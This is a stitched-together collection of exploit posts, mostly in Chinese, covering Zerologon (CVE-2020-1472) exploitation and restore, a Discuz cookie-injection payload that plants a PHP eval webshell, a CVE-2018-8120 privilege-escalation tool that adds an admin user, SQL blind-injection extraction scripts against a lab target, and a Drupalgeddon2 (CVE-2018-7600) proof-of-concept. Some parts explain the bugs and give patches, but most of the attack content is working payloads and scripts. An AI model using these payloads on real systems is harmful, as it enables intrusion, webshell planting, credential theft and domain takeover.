Requires the latest impacket from GitHub with added netlogon structures.

Do note that by default this changes the password of the domain controller account. Yes this allows you to DCSync, but it also breaks communication with other domain controllers, so be careful with this!

More info and original research here

Exploit steps

• Read the blog/whitepaper above so you know what you’re doing
• Run cve-2020-1472-exploit.py with IP and netbios name of DC
• DCSync with secretsdump, using -just-dc and -no-pass or empty hashes and the DCHOSTNAME$ account

Restore steps

If you make sure that this line in secretsdump passes (so make it if True: for example) secretsdump will also dump the plaintext (hex encoded) machine account password from the registry. You can do this by running it against the same DC and using a DA account.

Alternatively you can dump this same password by first extracting the registry hives and then running secretsdump offline (it will then always print the plaintext key because it can’t calculate the Kerberos hashes, this saves you modifying the library).

With this password you can run restorepassword.py with the -hexpass parameter. This will first authenticate with the empty password to the same DC and then set the password back to the original one. Make sure you supply the netbios name and IP again as target, so for example:

python restorepassword.py testsegment/s2016dc@s2016dc -target-ip 192.168.222.113 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3...etc

exp

修改Cookie中的xxxx_language字段为以下内容即可

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522a1%2522%255d%29%253b%253f%253e%27%29%29.%27

访问网站首页则会在根目录下生成木马文件,shell.php 密码为a1

定位漏洞位置

解码exp

'.+file_put_contents('shell.php',urldecode('<?php+ eval($_GET["a1"]);?>')).'

修改exp为_language=1.1.1;使其报错。

定位到653行

关键代码644行

$cachefile = './data/template/'.DISCUZ_LANG.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

cachefile变量是缓存文件，将其写入到/data/template/目录下，并且由DISCUZ_LANG拼接，追踪下DISCUZ_LANG的值
2088-2096行

global $_G;
if($_G['config']['output']['language'] == 'zh_cn') {
return 'SC_UTF8';
} elseif ($_G['config']['output']['language'] == 'zh_tw') {
return 'TC_UTF8';
} else {
//vot !!!! ToDo: Check this for other languages !!!!!!!!!!!!!!!!!!!!!
/*vot*/         return strtoupper(DISCUZ_LANG) . '_UTF8';
}

可以看到$_G['config']['output']['language']作为DISCUZ_LANG的值

全局搜索['language']

source/class/discuz/discuz_application.php 305行，发现是从cookie中拿到language的值

那么到这里整个漏洞的流程就很明显了，cookie中language参数可控导致DISCUZ_LANG可控，从而导致cachefile的文件名可被注入代码，最终include_once包含一下导致了造成代码执行。

phpinfo验证

Ov1T_2132_language='.phpinfo().';

修复建议

截止到本文发布之前，补丁还没有出来。

建议修改source/function/function_core.php 644行为

/*vot*/ $cachefile = './data/template/'.'sc'.'_'.(defined('STYLEID') ? STYLEID.'_' : '_').$templateid.'_'.str_replace('/', '_', $file).'.tpl.php';

删除可控变量

写在文后

其实从漏洞点的注释上来看就知道这是一个未完成的部分，毕竟还是TODO，开发人员得背锅。不过我怎么没有这种好运气呢，呜呜呜😭

Supports both x32 and x64.

Tested on: Win7 x32, Win7 x64, Win2008 x32, Win2008 R2 x32, Win2008 R2 Datacenter x64, Win2008 Enterprise x64.

Usage

CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
Usage: exp.exe command
Example: exp.exe "net user admin admin /ad"

Download

https://github.com/unamer/CVE-2018-8120/

Caution

• Please exclude shellcode.asm if you wanna compile x32 version.

Reference

• https://xiaodaozhi.com/exploit/156.html
• https://github.com/bigric3/cve-2018-8120

tips:

metasploit集成了脚本，见下面链接

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms18_8120_win32k_privesc.rb

最近忙着写主题模版，写插件，帮朋友做项目安全测试，还有自己学校的期末考试，但是越是期末，与紧张，就越是感觉非常刺激~

对于SQL注入还不理解的朋友可以参看之前的文章《SQL注入基础》,本文章主要讲SQL盲注。

0x00 盲注简介：

顾名思义，像盲人一样注入（什么鬼解释…），通俗来说，当我们发现有SQL注入时，确不能得到SQL查询的数据回显，除了之前的写文件方式，还有就是盲注了，盲注就是通过服务器返回的状态等各种因素来猜测，最终组合得到哦我们想要的数据。

0x01 盲注必须知识：

SQL盲注中常用的几个内置函数，了解一下~

length(str)：返回str字符串的长度。
substr(str, pos, len)：将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的，不是数组的0开始
mid(str,pos,len):跟上面的一样，截取字符串
ascii(str)：返回字符串str的最左面字符的ASCII代码值。
asc();同上
ord(str):同上，返回ascii码
if(a,b,c) :a为条件，a为true，返回b，否则返回c，如if(1>2,1,0),返回0

0x02 基于网页特征的Bool盲注：

这里还是基于Sqli平台吧，这货花样多~

先以最简单的 Less-8 这个单引号Bool盲注的题

分析源码:

<?php
//和原文件有删减，为了更好的阅读效果
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0); //不报错

if(isset($_GET['id']))    //如果有参数id传入
{
$id=$_GET['id'];

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

    if($row)    //如果查到数据就执行如下
    {
      echo '<font size="5" color="#FFFF00">';    
      echo 'You are in...........';
      echo "<br>";
        echo "</font>";
      }
    else     //否则执行这个     从两者返回的网页结构不一样，就可以作为我们盲注条件判断的依据
    {

    echo '<font size="5" color="#FFFF00">';
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';

    }
}
    else { echo "Please input the ID as parameter with numeric value";}

?>

根据服务器返回的不同网页结构来判断当前的SQL注入的关键词是否正确，一个有 You 单词，可根据这一特征。

构造这样的语句，返回if(true)的网页

不满足，返回if(false)的网页

下面就写一个简单的脚本来具体解释：

# name：SQL bind
# author:DYBOY
# time: 2018-07-01
# description: 用于SQL盲注学习脚本参考

import requests
import re


req = requests.Session()
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}


#盲注测试字符
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
#注入参考语句：id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=97+%23
#注入参考语句2： id=1%27+and+ascii(substr((select+username+from+users+limit+0,1),1,1))=ascii("a")+%23
username = "username:"
password = "password:"


#得到usernmae
for i in range(1,6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+"+%23"
        html = req.get(url,headers = header,timeout=8)
        guize  = r'You'
        if(re.findall(guize,html.text)):
            username = username + key
            print(username)


#得到password    
for j in range(1,6):
    for key in fuzz:
        url = main_url + "%27+and+ascii(substr((select+password+from+users+limit+0,1),"+str(j)+",1))="+str(ord(key))+"+%23"
        html = req.get(url,headers = header,timeout=8)
        guize  = r'You'
        if(re.findall(guize,html.text)):
            password = password + key
            print(password)

运行结果如下：

这个脚本就是基于网页特征来判定的，下面看看时间盲注的脚本怎么写！

0x03 延时注入：
当一个网页返回的数据根本没变化，报错也不管用，时间盲注就可以上线了！

先看一个SQL语句：

if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)

这个SQL语句执行的效果就是，如果if语句成立那么就服务器延时 3s 后返回网页给客户端，否则正常时间返回网页。通过这样一个条件，我们就可以进行时间盲注了。

时间盲注脚本如下：

# name：SQL time bind injection
# author:DYBOY
# time: 2018-07-01
# description: 用于SQL时间盲注学习脚本参考


import requests
import time

req = requests.Session()
header = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36"}

#盲注测试字符
fuzz = 'abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ@_.<>?/;!$#{}-'
fuzz = list(fuzz)

main_url = "http://www.test.com/Less-8/index.php?id=1"
#注入参考语句：id=1%27+and+if(ascii(substr((select+username+from+users+limit+0,1),1,1))=97,sleep(3),0)+%23

username = "username:"
password = "password:"

#得到username
for i in range(1,6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+username+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23"
        html = req.get(url,headers = header,timeout=8)
        if((time.time() - start_time)>=3):
            username = username + key
            print(username)


#得到password
for i in range(1,6):
    for key in fuzz:
        start_time = time.time()
        url = main_url + "%27+and+if(ascii(substr((select+password+from+users+limit+0,1),"+str(i)+",1))="+str(ord(key))+",sleep(3),0)+%23"
        html = req.get(url,headers = header,timeout=8)
        if((time.time() - start_time)>=3):
            password = password + key
            print(password)

运行结果：

没错，时间盲注就是将判断条件改成了时间，时间盲注往往有更广泛的用途~

0x04 总结
没错，就是这么简单！欢迎各位来探讨技术~

Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code .

影响版本

1. Drupal 6
2. Drupal 7
3. Drupal 8

修复建议

Drupal 6.x的修复参考以下网站：

https://www.drupal.org/project/d6lts

Drupal 7.x请升级到Drupal 7.5.8版本，

同时官方给出7.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=7.x&id=2266d2a83db50e2f97682d9a0fb8a18e2722cba5

Drupal 8.5.x请升级到Drupal 8.5.1版本

同时官方给出8.5.X补丁，若用户无法立即升级版本，请更新补丁，补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

Drupal 8.3.x和8.4.x版本官方已不进行维护，但此漏洞非常严重，官方此次也给出了对应补丁，补丁同8.5.x版本：补丁地址为：

https://cgit.drupalcode.org/drupal/rawdiff/?h=8.5.x&id=5ac8738fa69df34a0635f0907d661b509ff9a28f

由于Drupal 8.3.x和8.4.x版本官方已不进行维护，建议用户最好升级到官方维护的Drupal 8.3.9以及Drupal 8.4.6版本

友情提示

Drupal 8.0.x、Drupal 8.1.x、Drupal 8.2.x官方已不再维护，请各位用户升级到官方维护的版本

EXP

#!/usr/bin/env
import sys
import requests
print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')
target = input('Enter target url (example: https://domain.ltd/): ')
url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo ";-)" | tee hello.txt'}
r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')

链接: https://pan.baidu.com/s/1EseuV0RRtS7MYIDK03uhYw 密码: hfxv